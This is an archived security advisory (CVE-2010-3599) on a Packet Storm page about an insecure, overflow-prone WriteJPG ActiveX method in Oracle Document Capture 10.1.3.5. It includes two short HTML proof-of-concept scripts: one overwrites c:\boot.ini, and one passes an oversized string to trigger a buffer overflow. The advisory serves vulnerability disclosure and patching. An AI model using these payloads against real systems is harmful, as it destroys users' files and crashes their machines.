what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow

Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow
Posted Jan 26, 2011
Authored by Sh2kerr | Site dsecrg.com

Oracle Document Capture version 10.1.3.5 suffers from buffer overflow and insecure method vulnerabilities.

tags | exploit, overflow, vulnerability
advisories | CVE-2010-3599
SHA-256 | d8de28a03cf63e8eb852fd978524155069a598269f9adfa1fc15fb5c2f8912fa

Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow

Change Mirror Download
ActiveX components contain insecure methods.

Digital Security Research Group [DSecRG] Advisory DSECRG-11-006 (internal #DSECRG-09-066)


Application: Oracle Document Capture
Versions Affected: Oracle Document Capture 10.1.3.5
Vendor URL: http://oracle.com
Bugs: Insecure method. Buffer overflow.
Exploits: YES
Reported: 14.12.2009
Vendor response: 15.12.2009
Date of Public Advisory: 24.01.2011
CVE: CVE-2010-3599
Author: Alexandr Polyakov from DSecRG

Description
***********

Insecure method was founded in NCSECWLib ActiveX control component which is a part of Oracle Document Capture .
One of the methods (WriteJPG) can be used to overwrite files on users system and also affected to buffer overflow.




Details
*******

Attacker can construct html page which call vulnerable function "WriteJPG" from ActiveX Object NCSECWLib.

Example 1 (file overwrite)
*******


<html>
<script>
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
prototype = "Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean )"
memberName = "WriteJPG"
progid = "NCSECWLib.NCSRenderer"
argCount = 3

arg1="c:\boot.ini"
arg2=1
arg3=True

target.WriteJPG arg1 ,arg2 ,arg3

</script>
</html>


Example 2
*******

<html>
<script>
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
prototype = "Sub WriteJPG ( ByVal OutputFile As String , ByVal Quality As Long , ByVal bWriteWorldFile As Boolean )"
memberName = "WriteJPG"
progid = "NCSECWLib.NCSRenderer"
argCount = 3

arg1=String(13332, "A")
arg2=1
arg3=True

target.WriteJPG arg1 ,arg2 ,arg3

</script></job></package>


References
**********

http://dsecrg.com/pages/vul/show.php?id=306
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html




Fix Information
*************

Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from:

http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html


About
*****

Digital Security:

Is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.

Digital Security Research Group:

International subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product "ERPSCAN security suite for SAP NetWeaver" and service "ERPSCAN Online" which can help customers to perform automated security assessments and compliance checks for SAP solutions.


Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com



Polyakov Alexandr. PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
______________________
DIGITAL SECURITY
phone: +7 812 703 1547
+7 812 430 9130
e-mail: a.polyakov@dsec.ru

www.dsec.ru
www.dsecrg.com www.dsecrg.ru
www.erpscan.com www.erpscan.ru
www.pcidssru.com www.pcidss.ru


-----------------------------------
This message and any attachment are confidential and may be privileged or otherwise protected
from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure
is strictly prohibited. If you have received this message in error, please notify the sender immediately
either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence
via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding
statements by e-mail unless otherwise agreed.
-----------------------------------
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close